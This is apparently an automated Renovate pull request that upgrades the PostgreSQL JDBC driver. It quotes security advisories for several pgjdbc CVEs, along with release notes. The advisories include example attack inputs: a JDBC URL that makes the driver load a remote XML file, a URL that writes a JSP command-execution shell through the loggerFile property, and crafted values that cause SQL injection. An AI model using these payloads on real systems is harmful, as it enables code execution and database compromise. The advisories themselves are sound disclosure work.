Update dependency org.postgresql:postgresql to v42.3.3 [SECURITY]

[renovate]

This PR contains the following updates:

Package	Change	Age	Confidence
org.postgresql:postgresql (source)	42.2.23 → 42.3.3

---

Warning

Some dependencies could not be looked up. Check the Dependency Dashboard for more information.

GitHub Vulnerability Alerts

CVE-2022-21724

Impact

pgjdbc instantiates plugin instances based on class names provided via authenticationPluginClassName, sslhostnameverifier, socketFactory, sslfactory, sslpasswordcallback connection properties.

However, the driver did not verify if the class implements the expected interface before instantiating the class.

Here's an example attack using an out-of-the-box class from Spring Framework:

DriverManager.getConnection("jdbc:postgresql://node1/test?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=http://target/exp.xml");

The first impacted version is REL9.4.1208 (it introduced socketFactory connection property)

GHSA-673j-qm5f-xpv8

Overview

The connection properties for configuring a pgjdbc connection are not meant to be exposed to an unauthenticated attacker. While allowing an attacker to specify arbitrary connection properties could lead to a compromise of a system, that's a defect of an application that allows unauthenticated attackers that level of control.

It's not the job of the pgjdbc driver to decide whether a given log file location is acceptable. End user applications that use the pgjdbc driver must ensure that filenames are valid and restrict unauthenticated attackers from being able to supply arbitrary values. That's not specific to the pgjdbc driver either, it would be true for any library that can write to the application's local file system.

While we do not consider this a security issue with the driver, we have decided to remove the loggerFile and loggerLevel connection properties in the next release of the driver. Removal of those properties does not make exposing the JDBC URL or connection properties to an attacker safe and we continue to suggest that applications do not allow untrusted users to specify arbitrary connection properties. We are removing them to prevent misuse and their functionality can be delegated to java.util.logging.

If you identify an application that allows remote users to specify a complete JDBC URL or properties without validating it's contents, we encourage you to notify the application owner as that may be a security defect in that specific application.

Impact

It is possible to specify an arbitrary filename in the loggerFileName connection parameter
"jdbc:postgresql://localhost:5432/test?user=test&password=test&loggerLevel=DEBUG&loggerFile=./blah.jsp&<%Runtime.getRuntime().exec(request.getParameter("i"));%>"

This creates a valid JSP file which could lead to a Remote Code Execution

Patches

LoggerFile implementation has been removed and will be ignored by the driver, fixed in 42.3.3

Workarounds

sanitize the inputs to the driver

Reported by Allan Lou v3ged0ge@gmail.com

CVE-2022-26520

In pgjdbc before 42.3.3, an attacker (who controls the jdbc URL or properties) can call java.util.logging.FileHandler to write to arbitrary files through the loggerFile and loggerLevel connection properties. An example situation is that an attacker could create an executable JSP file under a Tomcat web root. NOTE: the vendor's position is that there is no pgjdbc vulnerability; instead, it is a vulnerability for any application to use the pgjdbc driver with untrusted connection properties.

CVE-2022-31197

Impact

What kind of vulnerability is it? Who is impacted?

The PGJDBC implementation of the java.sql.ResultRow.refreshRow() method is not performing escaping of column names so a malicious column name that contains a statement terminator, e.g. ;, could lead to SQL injection. This could lead to executing additional SQL commands as the application's JDBC user.

User applications that do not invoke the ResultSet.refreshRow() method are not impacted.

User application that do invoke that method are impacted if the underlying database that they are querying via their JDBC application may be under the control of an attacker. The attack requires the attacker to trick the user into executing SQL against a table name who's column names would contain the malicious SQL and subsequently invoke the refreshRow() method on the ResultSet.

For example:

CREATE TABLE refresh_row_example (
  id     int PRIMARY KEY,
  "1 FROM refresh_row_example; SELECT pg_sleep(10); SELECT * " int
);

This example has a table with two columns. The name of the second column is crafted to contain a statement terminator followed by additional SQL. Invoking the ResultSet.refreshRow() on a ResultSet that queried this table, e.g. SELECT * FROM refresh_row, would cause the additional SQL commands such as the SELECT pg_sleep(10) invocation to be executed.

As the multi statement command would contain multiple results, it would not be possible for the attacker to get data directly out of this approach as the ResultSet.refreshRow() method would throw an exception. However, the attacker could execute any arbitrary SQL including inserting the data into another table that could then be read or any other DML / DDL statement.

Note that the application's JDBC user and the schema owner need not be the same. A JDBC application that executes as a privileged user querying database schemas owned by potentially malicious less-privileged users would be vulnerable. In that situation it may be possible for the malicious user to craft a schema that causes the application to execute commands as the privileged user.

Patches

Has the problem been patched? What versions should users upgrade to?

Yes, versions 42.2.26, 42.3.7, and 42.4.1 have been released with a fix.

Workarounds

Is there a way for users to fix or remediate the vulnerability without upgrading?

Check that you are not using the ResultSet.refreshRow() method.

If you are, ensure that the code that executes that method does not connect to a database that is controlled by an unauthenticated or malicious user. If your application only connects to its own database with a fixed schema with no DDL permissions, then you will not be affected by this vulnerability as it requires a maliciously crafted schema.

CVE-2022-41946

Vulnerability

PreparedStatement.setText(int, InputStream)
and

PreparedStatemet.setBytea(int, InputStream)

will create a temporary file if the InputStream is larger than 51k

Example of vulnerable code:

String s = "some very large string greater than 51200 bytes";

PreparedStatement.setInputStream(1, new ByteArrayInputStream(s.getBytes()) );

This will create a temporary file which is readable by other users on Unix like systems, but not MacOS.

Impact
On Unix like systems, the system's temporary directory is shared between all users on that system. Because of this, when files and directories are written into this directory they are, by default, readable by other users on that same system.

This vulnerability does not allow other users to overwrite the contents of these directories or files. This is purely an information disclosure vulnerability.

When analyzing the impact of this vulnerability, here are the important questions to ask:

Is the driver running in an environment where the OS has other untrusted users.
If yes, and you answered 'yes' to question 1, this vulnerability impacts you.
If no, this vulnerability does not impact you.
Patches
Because certain JDK file system APIs were only added in JDK 1.7, this this fix is dependent upon the version of the JDK you are using.

Java 1.8 and higher users: this vulnerability is fixed in 42.2.27, 42.3.8, 42.4.3, 42.5.1
Java 1.7 users: this vulnerability is fixed in 42.2.27.jre7
Java 1.6 and lower users: no patch is available; you must use the workaround below.
Workarounds
If you are unable to patch, or are stuck running on Java 1.6, specifying the java.io.tmpdir system environment variable to a directory that is exclusively owned by the executing user will fix this vulnerability.

References
CWE-200: Exposure of Sensitive Information to an Unauthorized Actor
Fix commit pgjdbc/pgjdbc@9008dc9
Similar Vulnerabilities
Google Guava - https://github.com/google/guava/issues/4011
Apache Ant - https://nvd.nist.gov/vuln/detail/CVE-2020-1945
JetBrains Kotlin Compiler - https://nvd.nist.gov/vuln/detail/CVE-2020-15824

CVE-2024-1597

Impact

SQL injection is possible when using the non-default connection property preferQueryMode=simple in combination with application code that has a vulnerable SQL that negates a parameter value.

There is no vulnerability in the driver when using the default query mode. Users that do not override the query mode are not impacted.

Exploitation

To exploit this behavior the following conditions must be met:

1. A placeholder for a numeric value must be immediately preceded by a minus (i.e. -)
2. There must be a second placeholder for a string value after the first placeholder on the same line.
3. Both parameters must be user controlled.

The prior behavior of the driver when operating in simple query mode would inline the negative value of the first parameter and cause the resulting line to be treated as a -- SQL comment. That would extend to the beginning of the next parameter and cause the quoting of that parameter to be consumed by the comment line. If that string parameter includes a newline, the resulting text would appear unescaped in the resulting SQL.

When operating in the default extended query mode this would not be an issue as the parameter values are sent separately to the server. Only in simple query mode the parameter values are inlined into the executed SQL causing this issue.

Example

PreparedStatement stmt = conn.prepareStatement("SELECT -?, ?");
stmt.setInt(1, -1);
stmt.setString(2, "\nWHERE false --");
ResultSet rs = stmt.executeQuery();

The resulting SQL when operating in simple query mode would be:

SELECT --1,'
WHERE false --'

The contents of the second parameter get injected into the command. Note how both the number of result columns and the WHERE clause of the command have changed. A more elaborate example could execute arbitrary other SQL commands.

Patch

Problem will be patched upgrade to 42.7.2, 42.6.1, 42.5.5, 42.4.4, 42.3.9, 42.2.28, 42.2.28.jre7

The patch fixes the inlining of parameters by forcing them all to be serialized as wrapped literals. The SQL in the prior example would be transformed into:

SELECT -('-1'::int4), ('
WHERE false --')

Workarounds

Do not use the connection propertypreferQueryMode=simple. (NOTE: If you do not explicitly specify a query mode then you are using the default of extended and are not impacted by this issue.)

---

Release Notes

pgjdbc/pgjdbc (org.postgresql:postgresql)

v42.3.3

Changed

• fix: Removed loggerFile and loggerLevel configuration. While the properties still exist.
  They can no longer be used to configure the driver logging. Instead use java.util.logging
  configuration mechanisms such as logging.properties.

Added

Fixed

v42.3.2

Security

• CVE-2022-21724 pgjdbc instantiates plugin instances based on class names provided via authenticationPluginClassName,
  sslhostnameverifier, socketFactory, sslfactory, sslpasswordcallback connection properties.
  However, the driver did not verify if the class implements the expected interface before instantiating the class. This
  would allow a malicious class to be instantiated that could execute arbitrary code from the JVM. Fixed in commit

Changed

• perf: read in_hot_standby GUC on connection PR #​2334
• test: materialized view privileges PR #​2209 fixes Issue #​2060
• docs: add info about convenience maven project PR #​2407
• docs: Document timezone reversal from POSIX to ISO PR #​2413
• fix: we will ask the server if it supports GSS Encryption if gssEncryption
  is prefer or require PR #​2396 remove the need to have a ticket in the cache before asking the server if gss encryptions are supported
• docs: remove Java 6 and 7 references from contributing PR #​2385
• style: remove Java 8 / JDBC 4.2 checks PR #​2383 Remove all remaining checks whether the source is lower than Java 8
  or JDBC 4.2.
• fix: throw SQLException for #getBoolean BIT(>1) PR #​2386 Throw SQLException instead of ClassCastException when calling
  CallableStatement#getBoolean(int) on BIT(>1).
• style: import java.time types in more classes PR #​2382 Use imports for java.time types in all remaining classes.
• style: import java.time types in TimestampUtils PR #​2380 Use imports for java.time types in TimestampUtils.
• refactor: Change internal constructors to pass only connection Properties
  Changes internal constructors for PgConnection and related classes to only accept the connection properties object and
  remove the user and password arguments. Any locations that required those fields can retrieve them from the properties map.
• test: Fix DatabaseMetadataTest to perform mview tests only on 9.3+
• perf: read in_hot_standby GUC on connection PR #​2334
• doc: improv doc around binary decoding of numeric data #​2331
• Add cert key type checking to chooseClientAlias PR #​2417

Added

• feat: Add authenticationPluginClassName option to provide passwords at runtime
  Adds authenticationPluginClassName connection property that allows end users to specify a class
  that will provide the connection passwords at runtime. Users implementing that interface must
  ensure that each invocation of the method provides a new char[] array as the contents
  will be filled with zeroes by the driver after use.Call sites within the driver have been updated to use the char[] directly wherever possible.
  This includes direct usage in the GSS authentication code paths that internally were already converting the String password into a char[] for internal usage.
  This allows configuring a connection with a password that must be generated on the fly or periodically changes. PR #​2369 original issue Issue #​2102
• feat: add tcpNoDelay option PR #​2341 fixes Issue #​2324
• feat: pg_service.conf and .pgpass support (jdbc:postgresql://?service=my-service) PR #​2260 fixes Issue #​2278

Fixed

• Use local TimestampUtil in PgStatement and PgResultset for thread safety PR #​2291
  fixes Issue #​921 synchronize modification of shared calendar
• fix: PgObject isNull() was reporting the opposite fixes Issue #​2411 PR #​2414
• fix: default file name is ".pg_service.conf" on Windows (not "pg_service.conf") PR #​2398 fixes Issue #​2278
• test: Fix RefCursorFetchTest on older platforms
• fix: do not close refcursor after reading if fetchsize has been set fixes Issue #​2227 PR #​2371
• fix: rework gss authentication to use the principal name to get the credentials fixes Issue #​2235 PR #​2352
• fix: return getIndexInfo metadata columns in UPPER CASE PR #​2368
• fix: Connection leak in ConnectionFactoryImpl#tryConnect PR #​2350 Issue #​2351
• fix: Fix For IS_AUTOGENERATED Flag PR #​2348
• fix: parsing service file tests for windows PR #​2347
• fix: The spec says that calling close() on a closed connection is a noop. PR #​2345 fixes Issue #​2300
• fix: add microsecond precision to getTimestamp() called on sql TIME(6) Currently, "when fetching a value of type TIME(6) through
  resultSet.getTimestamp() only ms precision is retained, the microsecond fractional digits are lost." This change will retain the microsecond
  precision when .getTimestamp() is called on TIME(6). PR #​2181 Closes Issue #​1537
• test: materialized view privileges PR #​2209 add and drop a materialized view
  Add to TestUtil and also to DatabaseMetaData setup and teardown fixes Issue #​2060
• fix: typo in connect.md PR #​2338 OutOfMemoryException => OutOfMemoryError
• fix: use local TimestampUtil in PgStatement and PgResultset for thread
  safety TimestampUtil is not thread safe. It raises exceptions when multiple threads use ResultSets of one connection. PR #​2291
  fixes Issue #​921
  If PgStatement and PgResultSet use their own TimestampUtil no synchronize is needed.
• fix: typo in CONTRIBUTING.md PR #​2332 seccion => section

v42.3.1

Changed

• improv: Arrays in Object[] PR 2330 when an Object[] contains other arrays, treat as though it were a
  multi-dimensional array the one exception is byte[], which is not supported.
• improv: Use jre utf-8 decoding PR 2317 Remove use of custom utf-8 decoding.
• perf: improve performance of bytea string decoding PR 2320
  improve the parsing of bytea hex encoded string by making a lookup table for each of the valid ascii code points to the 4 bit numeric value
• feat: intern/canonicalize common strings PR 2234

Added

Fixed

• numeric binary decode for even 10 thousands PR #​2327 fixes Issue 2326
  binary numeric values which represented integers multiples of 10,000 from 10,000-9,990,000 were not decoded correctly
• [typo] typo in certdir/README.md PR #​2309 certificatess => certificates
• [typo] typo in TimestampUtils.java PR #​2314 Change Greagorian to Gregorian.
• remove check for negative pid in cancel request. Apparently pgbouncer can send one fixes Issue 2317 PR #​2319

v42.3.0

Changed

• No longer build for Java 6 or Java 7
• If assumeMinServerVersion is not defined and server is at least 9.0, group startup statements into a single transaction PR #​1977

Added

• Support for pg_service.conf file and jdbc URL syntax: "jdbc:postgresql://?service=service1".
  Resource can be provided using 1) property "-Dorg.postgresql.pgservicefile=file1" 2) environment variable PGSERVICEFILE=file2 3) default location "$HOME/.pg_service.conf" 4) environment variable PGSYSCONFDIR=dir1 looks for file "dir1/pg_service.conf".
• Support for .pgpass file. Resource can be provided using 1) property "-Dorg.postgresql.pgpassfile=file1" 2) environment variable PGPASSFILE=file2 3) default location "$HOME/.pgpass"

Fixed

• Rework OSGi bundle activator so it does not rely on exception message to check DataSourceFactory presence PR #​507
• Fix database metadata getFunctions() and getProcedures() to ignore search_path when no schema pattern is specified PR #​2174
• Fix refreshRow made the row readOnly. [PR #​2195](#​2195 Fixes Issue #​2193
• Fix do not add double quotes to identifiers already double quoted PR #​2224 Fixes Issue #​2223
  Add a property QUOTE_RETURNING_IDENTIFIERS which determines if we put double quotes
  around identifiers that are provided in the returning array.
• Fix Provide useful error message for empty or missing passwords for SCRAM auth PR #​2290 fixes Issue #​2288

v42.2.24

Fixed

• Fix startup regressions caused by PR #​1949. Instead of checking all types by OID, we can return types for well known types PR #​2257
• Backport PR #​2148
  Avoid leaking server error details through BatchUpdateException when logServerErrorDetail PR #​2254
• Backpatch PR #​2247
  QueryExecutorImpl.receiveFastpathResult did not properly handle ParameterStatus messages.
  This in turn caused failures for some LargeObjectManager operations. Closes Issue #​2237
  Fixed by adding the missing code path, based on the existing handling in processResults. PR #​2253
• Backpatch PR #​2242 PgDatabaseMetaData.getIndexInfo() cast operands to smallint PR#2253
  It is possible to break method PgDatabaseMetaData.getIndexInfo() by adding certain custom operators. This PR fixes it.
• Backpatching PR #​2251 into 42.2 Clean up open connections to fix test failures on omni and appveyor
  use older syntax for COMMENT ON FUNCTION with explicit no-arg parameter parentheses as it is required on server versions before v10.
  Handle cleanup of connection creation in StatementTest, handle cleanup of privileged connection in DatabaseMetaDataTest
• Backpatch PR #​2245 fixes case where duplicate tables are returned if there are duplicate descriptions oids are not guaranteed to be unique in the catalog PR #​2248
• Change to updatable result set to use correctly primary or unique keys PR #​2228
  fixes issues introduced in PR #​2199 closes Issue #​2196
• Fix NPE calling getTypeInfo when alias is null PR #​2220
• Backpatch PR #​2217 to fix Issue #​2215. OIDs are unsigned integers and were not being handled correctly when they exceeded the size of signed integers

---

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Enabled.

♻ Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.

[renovate]

Branch automerge failure

This PR was configured for branch automerge. However, this is not possible, so it has been raised as a PR instead.

---

• Branch has one or more failed status checks

[socket-security]

Review the following changes in direct dependencies. Learn more about Socket for GitHub.

Diff	Package	Supply Chain Security	Vulnerability	Quality	Maintenance	License
	org.postgresql/​postgresql@​42.2.23 ⏵ 42.3.3

View full report

[socket-security]

All alerts resolved. Learn more about Socket for GitHub.

This PR previously contained dependency changes with security issues that have been resolved, removed, or ignored.

View full report